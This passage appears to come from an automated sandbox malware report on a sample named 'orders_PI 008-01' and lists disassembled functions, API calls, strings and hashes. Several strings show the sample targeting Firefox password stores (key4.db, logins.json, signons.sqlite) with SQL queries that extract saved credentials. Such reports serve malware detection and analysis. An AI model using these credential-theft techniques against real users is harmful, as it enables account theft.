                                        • SendMessageA.USER32(?,00000301,00000000,00000000), ref: 0040FCCC
                                        • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0040FCD5
                                        • memset.MSVCRT ref: 0040FCFD
                                        • memset.MSVCRT ref: 0040FD1D
                                        • memset.MSVCRT ref: 0040FD3B
                                        • memset.MSVCRT ref: 0040FD54
                                        • memset.MSVCRT ref: 0040FD72
                                        • memset.MSVCRT ref: 0040FD8B
                                        • GetCurrentProcess.KERNEL32 ref: 0040FD93
                                        • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0040FDB8
                                        • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0040FDEE
                                        • memset.MSVCRT ref: 0040FE45
                                        • GetCurrentProcessId.KERNEL32 ref: 0040FE53
                                        • memcpy.MSVCRT(?,00457E70,00000118), ref: 0040FE82
                                        • _mbscpy.MSVCRT(?,00000000), ref: 0040FEA4
                                        • sprintf.MSVCRT ref: 0040FF0F
                                        • SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040FF28
                                        • GetDlgItem.USER32(?,000003EA), ref: 0040FF32
                                        • SetFocus.USER32(00000000), ref: 0040FF39
                                        Strings
                                        • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040FF09
                                        • {Unknown}, xrefs: 0040FD02
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_mbscpymemcpysprintf
                                        • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                                        • API String ID: 1428123949-3474136107
                                        • Opcode ID: de300881e20ea23b7bb50552807e946df4066f391255ce58fe159596e1188ae6
                                        • Instruction ID: dbacf55a19a30e1480a431b78f30a2e126a23dc86512cc8492e46cc2065c5524
                                        • Opcode Fuzzy Hash: de300881e20ea23b7bb50552807e946df4066f391255ce58fe159596e1188ae6
                                        • Instruction Fuzzy Hash: 6371A972808345BFE7319B51EC41EDB7B9CFB84345F04043AF644921A2DA79DE49CB6A
                                        Function 00401060 Relevance: 39.2, APIs: 26, Instructions: 186COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                        • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                        • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                        • LoadCursorA.USER32(00000067), ref: 0040115F
                                        • SetCursor.USER32(00000000,?,?), ref: 00401166
                                        • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                        • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                        • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                        • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                        • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                        • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                        • EndDialog.USER32(?,00000001), ref: 0040121A
                                        • DeleteObject.GDI32(?), ref: 00401226
                                        • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                        • ShowWindow.USER32(00000000), ref: 00401253
                                        • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                        • ShowWindow.USER32(00000000), ref: 00401262
                                        • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                        • memset.MSVCRT ref: 0040128E
                                        • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                        • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                        • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                        • String ID:
                                        • API String ID: 2998058495-0
                                        • Opcode ID: 1304d1c8d715b31a593d177d1fcf49c0df4ecd0a9b3deb669dc5f6aa527f4ccf
                                        • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                        • Opcode Fuzzy Hash: 1304d1c8d715b31a593d177d1fcf49c0df4ecd0a9b3deb669dc5f6aa527f4ccf
                                        • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                        Function 0040BBF0 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 300windowregistrystringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00409070: LoadMenuA.USER32(00000000), ref: 00409078
                                          • Part of subcall function 00409070: sprintf.MSVCRT ref: 0040909B
                                        • SetMenu.USER32(?,00000000), ref: 0040BD23
                                        • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040BD56
                                        • LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040BD6C
                                        • CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040BDCC
                                        • LoadIconA.USER32(00000066,00000000), ref: 0040BE3B
                                        • _strcmpi.MSVCRT ref: 0040BE93
                                        • RegDeleteKeyA.ADVAPI32(80000001,0044C52F), ref: 0040BEA8
                                        • SetFocus.USER32(?,00000000), ref: 0040BECE
                                        • GetFileAttributesA.KERNEL32(0045AB10), ref: 0040BEE7
                                        • GetTempPathA.KERNEL32(00000104,0045AB10), ref: 0040BEF7
                                        • strlen.MSVCRT ref: 0040BEFE
                                        • strlen.MSVCRT ref: 0040BF0C
                                        • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0040BF68
                                          • Part of subcall function 00404B87: strlen.MSVCRT ref: 00404BA4
                                          • Part of subcall function 00404B87: SendMessageA.USER32(?,0000101B,?,?), ref: 00404BC8
                                        • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040BFB3
                                        • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040BFC6
                                        • memset.MSVCRT ref: 0040BFDB
                                        • SetWindowTextA.USER32(?,?), ref: 0040BFFF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: MessageSend$Loadstrlen$MenuWindow$AttributesClipboardCreateDeleteFileFocusFormatIconImagePathRegisterTempText_strcmpimemsetsprintf
                                        • String ID: /noloadsettings$SysListView32$commdlg_FindReplace$report.html
                                        • API String ID: 2303586283-933021314
                                        • Opcode ID: ee83ce8392c91b6a1376ce061df6a688643c70b4fadf0565b78a002f471a3540
                                        • Instruction ID: 018683a0c001df71ea8fb117e25ab04faf3265e4b472b332b07084323bdedb2f
                                        • Opcode Fuzzy Hash: ee83ce8392c91b6a1376ce061df6a688643c70b4fadf0565b78a002f471a3540
                                        • Instruction Fuzzy Hash: 5DC1C071644388FFEB15DF64CC45BDABBA5FF14304F04016AFA44A7292C7B5A904CBA9
                                        Function 0044257F Relevance: 33.4, APIs: 7, Strings: 15, Instructions: 375COMMON
                                        Download Yara Rule
                                        APIs
                                        • memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                        • memcmp.MSVCRT(localhost,?,00000009,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442656
                                        • memcmp.MSVCRT(vfs,00000001,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442800
                                        • memcmp.MSVCRT(cache,00000001,00000005,00000000,00000000,BINARY), ref: 0044282C
                                        • memcmp.MSVCRT(mode,00000001,00000004,00000000,00000000,BINARY), ref: 0044285E
                                        • memcmp.MSVCRT(?,?,G+D,00000000,00000000,BINARY), ref: 004428A9
                                        • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 0044293C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcmp$memcpy
                                        • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                        • API String ID: 231171946-2189169393
                                        • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                        • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                                        • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                        • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                        Function 0041108D Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 101COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _mbscat$memsetsprintf$_mbscpy
                                        • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                        • API String ID: 633282248-1996832678
                                        • Opcode ID: 3118318c37942661f5fcffc3ac6ba245d9ce7bfece0bd670dd31aaefef13242f
                                        • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                        • Opcode Fuzzy Hash: 3118318c37942661f5fcffc3ac6ba245d9ce7bfece0bd670dd31aaefef13242f
                                        • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                        Function 00406746 Relevance: 30.3, APIs: 16, Strings: 4, Instructions: 287COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 00406782
                                          • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                          • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                        • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040685E
                                        • memcmp.MSVCRT(00000000,00457934,00000006,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040686E
                                        • memcpy.MSVCRT(?,00000023,?,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068A1
                                        • memcpy.MSVCRT(?,?,00000010), ref: 004068BA
                                        • memcpy.MSVCRT(?,?,00000010), ref: 004068D3
                                        • memcmp.MSVCRT(00000000,0045793C,00000006,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068EC
                                        • memcpy.MSVCRT(?,00000015,?), ref: 00406908
                                        • memcmp.MSVCRT(00000000,00456EA0,00000010,?,?,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 004069B2
                                        • memcmp.MSVCRT(00000000,00457944,00000006), ref: 004069CA
                                        • memcpy.MSVCRT(?,00000023,?), ref: 00406A03
                                        • memcpy.MSVCRT(?,00000042,00000010), ref: 00406A1F
                                        • memcpy.MSVCRT(?,00000054,00000020), ref: 00406A3B
                                        • memcmp.MSVCRT(00000000,0045794C,00000006), ref: 00406A4A
                                        • memcpy.MSVCRT(?,00000015,?), ref: 00406A6E
                                        • memcpy.MSVCRT(?,0000001A,00000020), ref: 00406A86
                                        Strings
                                        • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                                        • , xrefs: 00406834
                                        • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                                        • key4.db, xrefs: 00406756
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpy$memcmp$memsetstrlen
                                        • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                        • API String ID: 3614188050-3983245814
                                        • Opcode ID: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                        • Instruction ID: f64da88478914857a13bd548ab7de8656dcb141f17a11f318e4dfa38f1e39988
                                        • Opcode Fuzzy Hash: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                        • Instruction Fuzzy Hash: 76A1C7B1A00215ABDB14EFA5D841BDFB3A8FF44308F11453BF515E7282E778EA548B98
                                        Function 0040A953 Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 182COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 0040A973
                                        • memset.MSVCRT ref: 0040A996
                                        • memset.MSVCRT ref: 0040A9AC
                                        • memset.MSVCRT ref: 0040A9BC
                                        • sprintf.MSVCRT ref: 0040A9F0
                                        • _mbscpy.MSVCRT(00000000, nowrap), ref: 0040AA37
                                        • sprintf.MSVCRT ref: 0040AABE
                                        • _mbscat.MSVCRT ref: 0040AAED
                                          • Part of subcall function 00410FD3: sprintf.MSVCRT ref: 00410FF7
                                        • _mbscpy.MSVCRT(?,?), ref: 0040AAD2
                                        • sprintf.MSVCRT ref: 0040AB21
                                          • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                          • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,`Wu,00000000,?,?,0040A7BE,00000001,0044CBC0,75570A60), ref: 00406D4D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                        • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                        • API String ID: 710961058-601624466
                                        • Opcode ID: c33c3296b7e77e76534675bd69894b8e30877f2258b439036e8e249278821d93
                                        • Instruction ID: c58e6c37e7046e1a5f8c637d7d1376bb8f99d5739874c3f6ad91cefff1898c28
                                        • Opcode Fuzzy Hash: c33c3296b7e77e76534675bd69894b8e30877f2258b439036e8e249278821d93
                                        • Instruction Fuzzy Hash: 5F61BC31900258AFEF14DF58CC86E9E7B79EF08314F10019AF909AB1D2DB78AA51CB55
                                        Function 004111AA Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 114COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: sprintf$memset$_mbscpy
                                        • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                        • API String ID: 3402215030-3842416460
                                        • Opcode ID: ea23fa7928f637b81322df5704cb4e79e7cdaf63d3e69134c948d1ddb26e9ea3
                                        • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                        • Opcode Fuzzy Hash: ea23fa7928f637b81322df5704cb4e79e7cdaf63d3e69134c948d1ddb26e9ea3
                                        • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                        Function 0040F0CE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 192stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                          • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                          • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                          • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                          • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                          • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                          • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                          • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                          • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                          • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                          • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                        • strlen.MSVCRT ref: 0040F139
                                        • strlen.MSVCRT ref: 0040F147
                                        • memset.MSVCRT ref: 0040F187
                                        • strlen.MSVCRT ref: 0040F196
                                        • strlen.MSVCRT ref: 0040F1A4
                                        • memset.MSVCRT ref: 0040F1EA
                                        • strlen.MSVCRT ref: 0040F1F9
                                        • strlen.MSVCRT ref: 0040F207
                                        • _strcmpi.MSVCRT ref: 0040F2B2
                                        • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                        • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                          • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                          • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                        • String ID: logins.json$none$signons.sqlite$signons.txt
                                        • API String ID: 2003275452-3138536805
                                        • Opcode ID: 902799fa4b1ae56d660fb5b5f253a280b97e2ca6f8806fc11f1a2088d22d41ab
                                        • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                        • Opcode Fuzzy Hash: 902799fa4b1ae56d660fb5b5f253a280b97e2ca6f8806fc11f1a2088d22d41ab
                                        • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                        Function 0040C3D0 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 111stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 0040C3F7
                                        • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                                        • strrchr.MSVCRT ref: 0040C417
                                        • _mbscat.MSVCRT ref: 0040C431
                                        • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
                                        • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                                        • GetWindowPlacement.USER32(?,?), ref: 0040C50C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                        • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                        • API String ID: 1012775001-1343505058
                                        • Opcode ID: 9e23aae614ac24114fc18125b019b65eb6573faab22d4a721f00cae62469f9bb
                                        • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                        • Opcode Fuzzy Hash: 9e23aae614ac24114fc18125b019b65eb6573faab22d4a721f00cae62469f9bb
                                        • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                        Function 0040CDDA Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 70COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _strcmpi
                                        • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                        • API String ID: 1439213657-1959339147
                                        • Opcode ID: fc398c435b3d1a27aa6bafcedfb0a9c88799152dfe3da8b7518a640bbec7b317
                                        • Instruction ID: 098916069379b780452bf0adc0bc0339f4c30180c2e3981bbd8ab1a2d20b7c26
                                        • Opcode Fuzzy Hash: fc398c435b3d1a27aa6bafcedfb0a9c88799152dfe3da8b7518a640bbec7b317
                                        • Instruction Fuzzy Hash: 6F01446768576224F924226ABC17F870B44CF91BBAF31015FF519D94D5EF5CA04050AC
                                        Function 004445ED Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 202stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 00444612
                                          • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                        • strlen.MSVCRT ref: 0044462E
                                        • memset.MSVCRT ref: 00444668
                                        • memset.MSVCRT ref: 0044467C
                                        • memset.MSVCRT ref: 00444690
                                        • memset.MSVCRT ref: 004446B6
                                          • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                          • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                          • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                          • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                          • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                        • memcpy.MSVCRT(?,00000000,00000008,?,?,?,00000000,000003FF,?,00000000,0000041E,?,00000000,0000041E,?,00000000), ref: 004446ED
                                          • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                          • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                          • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                        • memcpy.MSVCRT(?,?,00000010,?,?), ref: 00444729
                                        • memcpy.MSVCRT(?,?,00000008,?,?,00000010,?,?), ref: 0044473B
                                        • _mbscpy.MSVCRT(?,?), ref: 00444812
                                        • memcpy.MSVCRT(?,?,00000004,?,?,?,?), ref: 00444843
                                        • memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,?,?,?), ref: 00444855
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpymemset$strlen$_mbscpy
                                        • String ID: salu
                                        • API String ID: 3691931180-4177317985
                                        • Opcode ID: b7cf63fef92e37f4bb0d3b69adaea4b1cc931356000d291c0cdd30d7a2f6e4ad
                                        • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                                        • Opcode Fuzzy Hash: b7cf63fef92e37f4bb0d3b69adaea4b1cc931356000d291c0cdd30d7a2f6e4ad
                                        • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                                        Function 00410034 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                        • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                        • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                        • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
